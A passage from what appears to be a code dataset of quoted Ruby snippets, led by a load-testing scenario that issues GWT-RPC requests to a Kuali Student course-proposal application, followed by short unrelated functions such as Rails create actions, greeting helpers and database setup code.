'courseTitle\\\"\\,\\\"\\([^\\\"]+\\)',\n :oversight_org_dyn_var => 'ep_oversight_org',\n :oversight_org_regexp => 'curriculumOversightOrgs\\\"\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_dyn_var => 'ep_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_dur_week_id_dyn_var => 'ep_atp_dur_week_id',\n :atp_dur_week_id_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_id_dyn_var => 'ep_lab_id',\n :lab_id_regexp => 'Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :grade_id_dyn_var => 'ep_grade_id',\n :grade_id_regexp => 'kuali.resultComponent.grade[^\\,]+\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :person_id_dyn_var => 'ep_person_id',\n :person_id_regexp => 'personId\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_dyn_var => 'ep_joints',\n :joints_regexp => 'joints\\\"\\,\\\"\\([^\\\"]+\\)',\n :subject_area_dyn_var => 'ep_subject_area',\n :subject_area_regexp => 'subjectArea\\\"\\,\\\"\\([^\\\"]+\\)',\n :title_dyn_var => 'ep_title',\n :title_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :rationale_dyn_var => 'ep_rationale',\n :rationale_regexp => 'rationale\\\"\\,\\\"\\([^\\\"]+\\)',\n :modify_fields => {\n :course_information => {},\n :governance => {},\n :course_logistics => {},\n :learning_objectives => {},\n :active_dates => {},\n :financials => {}\n }\n }\n \n opts = defaults.merge(opts)\n \n # Search for proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|13|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.lang.Integer/3438268394|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|proposal.queryParam.proposalOptionalName|#{proposal_name}|proposal.search.generic|proposal.resultColumn.proposalOptionalName|1|2|3|4|1|5|5|6|10|7|0|8|1|9|10|0|11|12|13|0|6|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_id_dyn_var], \"regexp\" => opts[:proposal_id_regexp]}\n ]\n }\n )\n \n # Select\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|isAuthorized|org.kuali.student.core.rice.authorization.PermissionType/259370389|java.util.Map|java.util.HashMap/962170901|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|6|5|1|7|1|8|9|8|10|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|5|6|7|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getData|java.lang.String/2004016611|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:workflow_id_dyn_var], \"regexp\" => opts[:workflow_id_regexp]},\n {\"name\" => opts[:id_translation_id_dyn_var], \"regexp\" => opts[:id_translation_id_regexp]},\n {\"name\" => opts[:code_dyn_var], \"regexp\" => opts[:code_regexp]},\n {\"name\" => opts[:course_num_suffix_dyn_var], \"regexp\" => opts[:course_num_suffix_regexp]},\n {\"name\" => opts[:lo_category_id_dyn_var], \"regexp\" => opts[:lo_category_id_regexp]},\n {\"name\" => opts[:lo_category_dyn_var], \"regexp\" => opts[:lo_category_dyn_var]},\n {\"name\" => opts[:lo_cat_text_dyn_var], \"regexp\" => opts[:lo_cat_text_regexp]},\n {\"name\" => opts[:lo_cat_id_dyn_var], \"regexp\" => opts[:lo_cat_id_regexp]},\n {\"name\" => opts[:create_id_dyn_var], \"regexp\" => opts[:create_id_regexp]},\n {\"name\" => opts[:course_title_dyn_var], \"regexp\" => opts[:course_title_regexp]},\n {\"name\" => opts[:oversight_org_dyn_var], \"regexp\" => opts[:oversight_org_regexp]},\n {\"name\" => opts[:lab_fee_id_dyn_var], \"regexp\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:atp_dur_week_id_dyn_var], \"regexp\" => 
opts[:atp_dur_week_id_regexp]},\n {\"name\" => opts[:lab_id_dyn_var], \"regexp\" => opts[:lab_id_regexp]},\n {\"name\" => opts[:grade_id_dyn_var], \"regexp\" => opts[:grade_id_regexp]},\n {\"name\" => opts[:person_id_dyn_var], \"regexp\" => opts[:person_id_regexp]},\n {\"name\" => opts[:joints_dyn_var], \"regexp\" => opts[:joints_regexp]},\n {\"name\" => opts[:subject_area_dyn_var], \"regexp\" => opts[:subject_area_regexp]},\n {\"name\" => opts[:proposal_num_dyn_var], \"regexp\" => opts[:proposal_num_regexp]},\n {\"name\" => opts[:title_dyn_var], \"regexp\" => opts[:title_regexp]},\n {\"name\" => opts[:rationale_dyn_var], \"regexp\" => opts[:rationale_regexp]}\n ]\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 
'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 
'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n # Edit Proposal\n \n if(!opts[:modify_fields][:course_information].empty?)\n \n if(opts[:modify_fields][:course_information][:description])\n \n # Save changes\n contents1 = \"5|0|159|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.core.assembly.data.Data/3119441076|org.kuali.student.core.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.core.assembly.data.Data$StringKey/1742996354|administeringOrgs|org.kuali.student.core.assembly.data.Data$DataValue/4040075329|org.kuali.student.core.assembly.data.Data$IntegerKey/2690592210|java.lang.Integer/3438268394|org.kuali.student.core.assembly.data.Data$StringValue/3696151110|58|_runtimeData|id-translation|%%_#{opts[:id_translation_id_dyn_var]}%%|passFail|org.kuali.student.core.assembly.data.Data$BooleanValue/268767974|java.lang.Boolean/476441737|audit|finalExamStatus|STD|campusLocations|ALL|All|code|%%_#{opts[:code_dyn_var]}%%|courseNumberSuffix|%%_#{opts[:course_num_suffix_dyn_var]}%%|courseSpecificLOs|loCategoryInfoList|desc|formatted|<p>Desc</p>|plain|Desc|effectiveDate|org.kuali.student.core.assembly.data.Data$DateValue/3833457837|java.sql.Timestamp/1769758459|expirationDate|id|%%_#{opts[:lo_category_id_dyn_var]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|versionInd|1|name|%%_#{opts[:lo_category_dyn_var]}%%|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|0|%%_#{opts[:lo_cat_text_dyn_var]}%%|%%_#{opts[:lo_cat_id_dyn_var]}%%|loRepositoryKey|createId|%%_#{opts[:create_id_dyn_var]}%%|createTime|updateId|updateTime|SINGLE USE LO|kuali.lo.type.singleUse|courseTitle|%%_#{opts[:course_title_dyn_var]}%%|creditOptions|fixedCreditValue|10|kuali.creditType.credit.degree.10|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, 
Fixed|crossListings|curriculumOversightOrgs|51|%%_#{opts[:oversight_org_dyn_var]}%%|descr|#{opts[:modify_fields][:course_information][:description]}|dirty|duration|atpDurationTypeKey|kuali.atp.duration.Year|timeQuantity|org.kuali.student.core.assembly.data.Data$IntegerValue/991919491|Year|expenditure|affiliatedOrgs|feeJustification|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_dyn_var]}%%|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_dur_week_id_dyn_var]}%%|2|draft|Lab|%%_#{opts[:lab_id_dyn_var]}%%|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:grade_id_dyn_var]}%%|instructors|personId|%%_#{opts[:person_id_dyn_var]}%%|joints|%%_#{opts[:joints_dyn_var]}%%|pilotCourse|revenues|specialTopicsCourse|subjectArea|%%_#{opts[:subject_area_dyn_var]}%%|termsOffered|kuali.atp.season.Any|Any|kuali.lu.type.CreditCourse|variations|Standard final Exam|transcriptTitle|proposal|%%_#{opts[:proposal_id_dyn_var]}%%|%%_#{opts[:proposal_num_dyn_var]}%%|%%_#{opts[:title_dyn_var]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|%%_#{opts[:rationale_dyn_var]}%%|kuali.proposal.type.course.create|workflowId|%%_#{opts[:workflow_id_dyn_var]}%%|\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|34|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|19|20|0|8|21|19|-22|8|22|13|23|8|24|10|5|6|7|0|2|11|-8|13|25|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|26|-35|-37|-29|-33|-1|-27|8|27|13|28|8|29|13|30|8|31|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|32|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|33|10|5|6|7|0|2|8|34|13|35|8|36|13|37|-61|-63|8|38|39|40|867724416|1198295875584|0|8|41|39|40|3896582272|1258425417728|0|8|42|13|43|8|44|13|45|8|46|10|5|6|7|0|1|8|47|13|48|-61|-81|8|49|13|50|8|51|13|52|8|53|13|54|-57|-59|-53|-55|8|55|10|5|6|7|0|0|-53|-93|8|56|10|5|6|7|0|7|8|57|13|58|8|33|10|5|6|7|0|2|8|34|13|59|8|36|13|59|-99|-103|8|42|13|60|8|61|13|45|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246181412|1284195221504|916000000|8|65|13|63|8|66|39|40|3246183944|1284195221504|448000000|8|47|13|48|-99|-115|8|49|13|67|8|53|13|68|-53|-97|-49|-51|-1|-47|8|69|13|70|8|71|10|5|6|7|0|1|11|-8|10|5|6|7|0|6|8|72|13|73|8|42|13|74|8|46|10|5|6|7|0|1|8|47|13|58|-143|-149|8|75|10|5|6|7|0|1|11|-8|13|73|-143|-155|8|53|13|76|8|15|10|5|6|7|0|1|8|53|10|5|6|7|0|1|8|16|13|77|-165|-167|-143|-163|-139|-141|-1|-137|8|78|10|5|6|7|0|0|-1|-173|8|79|10|5|6|7|0|2|11|-8|13|80|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|81|-185|-187|-179|-183|-1|-177|8|82|10|5|6|7|0|2|8|36|13|83|8|15|10|5|6|7|0|1|8|84|10|5|6|7|0|1|8|36|19|20|1|-201|-203|-195|-199|-1|-193|8|85|10|5|6|7|0|3|8|86|13|87|8|88|89|12|1|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|90|-221|-223|-212|-219|-1|-210|8|91|10|5|6|7|0|1|8|92|10|5|6|7|0|0|-231|-233|-1|-229|8|93|10|5|6|7|0|0|-1|-237|8|94|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|95|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|96|89|12|10|8|97|13|98|-251|-253|-247|-249|8|99|13|100|8|42|13|101|8|102|13|103|8|15|10|5|6|7|0|2|8|102|10|5|6|7|0|1|8|16|13|104|-270|-272|8|99|10|5|6|7|0|1|8|16|13|105|-270|-278|-247|-268|-243|-245|-1|-241|8|106|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|107|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|108|13|109|8|110|10|5|6|7
|0|3|8|111|13|73|8|112|13|113|8|15|10|5|6|7|0|1|8|112|10|5|6|7|0|1|8|16|13|114|-312|-314|-304|-310|-298|-302|8|79|10|5|6|7|0|0|-298|-320|8|115|89|12|100|8|85|10|5|6|7|0|3|8|86|13|116|8|88|89|12|12|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|117|-338|-340|-329|-336|-298|-327|8|42|13|118|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177449|1284195221504|953000000|8|65|13|63|8|66|39|40|3246183904|1284195221504|408000000|8|47|13|119|-298|-348|8|51|13|120|8|15|10|5|6|7|0|1|8|108|10|5|6|7|0|1|8|16|13|121|-368|-370|-298|-366|-294|-296|-290|-292|8|42|13|122|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177416|1284195221504|920000000|8|65|13|63|8|66|39|40|3246183890|1284195221504|394000000|8|47|13|119|-290|-378|8|51|13|120|8|53|13|123|-286|-288|-1|-284|8|124|10|5|6|7|0|2|11|-8|13|125|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|126|-406|-408|-400|-404|-1|-398|8|42|13|127|8|128|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|129|13|63|8|15|10|5|6|7|0|1|8|129|10|5|6|7|0|1|8|16|13|130|-428|-430|-422|-426|-418|-420|-1|8|128|8|131|10|5|6|7|0|0|-1|-437|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166611|1284195221504|115000000|8|65|13|63|8|66|39|40|3246183834|1284195221504|338000000|8|47|13|132|-1|-441|8|133|19|-22|8|134|10|5|6|7|0|0|-1|-459|8|135|19|-22|8|51|13|120|8|136|13|137|8|138|10|5|6|7|0|2|11|-8|13|139|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|140|-477|-479|-471|-475|-1|-469|8|53|13|141|8|142|10|5|6|7|0|0|-1|-487|8|15|10|5|6|7|0|3|8|136|10|5|6|7|0|1|8|16|13|137|-493|-495|8|22|10|5|6|7|0|1|8|16|13|143|-493|-501|-203|10|5|6|7|0|3|8|144|19|-209|8|128|19|-209|8|136|19|-209|-493|-203|-1|-491|8|145|10|5|6|7|0|10|8|42|13|146|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166532|1284195221504|36000000|8|65|13|63|8|66|39|40|3246183375|1284195221504|879000000|8|47|13|147|-518|-522|8|49|13|148|8|149|10|5|6|7|0|1|11|-8|13|127|-518|-540|8|150|13|151|8|152|10|5|6|7|0|0|-518|-548|8|153|10|5|6|7|0|0|-518|-552|8|154|13|155|8|53|13|156|8|157|13|158|-1|-516|-510|13|159|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n end\n \n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n end",
"def greet_with_language(name, language = 'pt')\n case language.downcase\n when 'en'\n puts \"Hello, #{name.capitalize}\"\n when 'es'\n puts \"Hola, #{name.capitalize}\"\n else\n puts \"Olá, #{name.capitalize}\"\n end\nend",
"def create_extension\n execute(\"SET client_min_messages = warning\")\n begin\n execute(\"CREATE EXTENSION IF NOT EXISTS hypopg\")\n rescue PG::UndefinedFile\n abort \"Install HypoPG first: https://github.com/ankane/dexter#installation\"\n rescue PG::InsufficientPrivilege\n abort \"Use a superuser to run: CREATE EXTENSION hypopg\"\n end\n end",
"def ensure_languages(owner, repo)\n currepo = ensure_repo(owner, repo)\n langs = retrieve_languages(owner, repo)\n\n if langs.nil? or langs.empty?\n warn \"Could not find languages for repo #{owner}/#{repo}\"\n return\n end\n\n ts = Time.now\n langs.keys.each do |lang|\n db[:project_languages].insert(\n :project_id => currepo[:id],\n :language => lang.downcase,\n :bytes => langs[lang],\n :created_at => ts\n )\n info \"Added project_language #{owner}/#{repo} -> #{lang} (#{langs[lang]} bytes)\"\n end\n db[:project_languages].where(:project_id => currepo[:id]).where(:created_at => ts).all\n end",
"def greetings_programmer(name, language = \"computer\")\n puts \"Hello, #{name}. We heard you are a great #{language} programmer.\"\nend",
"def create\n @actor_language = ActorLanguage.new(actor_language_params)\n\n respond_to do |format|\n if @actor_language.save\n format.html { redirect_to @actor_language, notice: 'Actor language was successfully created.' }\n format.json { render :show, status: :created, location: @actor_language }\n else\n format.html { render :new }\n format.json { render json: @actor_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @language = Language.new(language_params)\n\n respond_to do |format|\n if @language.save\n flash[:notice] = 'Language was successfully created.'\n format.html { redirect_to(@language) }\n format.xml { render xml: @language, status: :created, location: @language }\n else\n format.html { render action: 'new' }\n format.xml { render xml: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_procedure(opts={})\n name = opts[:name]\n raise Error, \"JSON-RPC procedure must have a name\" if name.blank?\n proc = opts[:proc]\n raise Error, \"JSON-RPC procedure must specify a :proc to be executed locally\" if proc.blank?\n begin\n proc = proc.to_proc\n rescue Exception => e\n raise Error, \":proc argument could not be converted to a proc (#{e.message})\"\n end\n opts[:proc] = proc\n # Canonicalise opts[:params]. We use strings internally, since parameter names will be \n # passed as such.\n opts[:params] = (opts[:params] || []).collect do |p|\n if p.is_a?(String)\n {:name => p.to_s, :type => 'any'}\n else\n {:name => p[:name].to_s, :type => (p[:type] || 'any').to_s}\n end\n end\n # Canonicalise opts[:return]\n opts[:return] = if opts[:return]\n {:type => (opts[:return][:type] || 'any').to_s}\n else\n {:type => 'any'}\n end\n # Register the new procedure with the service\n self.procs[name] = opts\n # Empty the system.describe cache\n @sd_cache = nil\n # Finally return the procedure's call name\n name\n end",
"def create\n @o_single = Language.new(language_params)\n respond_to do |format|\n if @o_single.save\n create_locale_file\n format.html { redirect_to admin_languages_url, notice: t(\"general.successfully_created\") }\n format.json { head :no_content }\n else\n format.html { render action: 'new' }\n format.json { render json: @o_single.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_language_content(language_id, data)\n create_content(Voog::API::Contents::ParentKind::Language, language_id, data)\n end",
"def politician_name_checker_create(string)\n if string.length < 1\n puts \"Please enter a valid name.\"\n World.create_politician\n end\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def create\n # コードを記述する\n end",
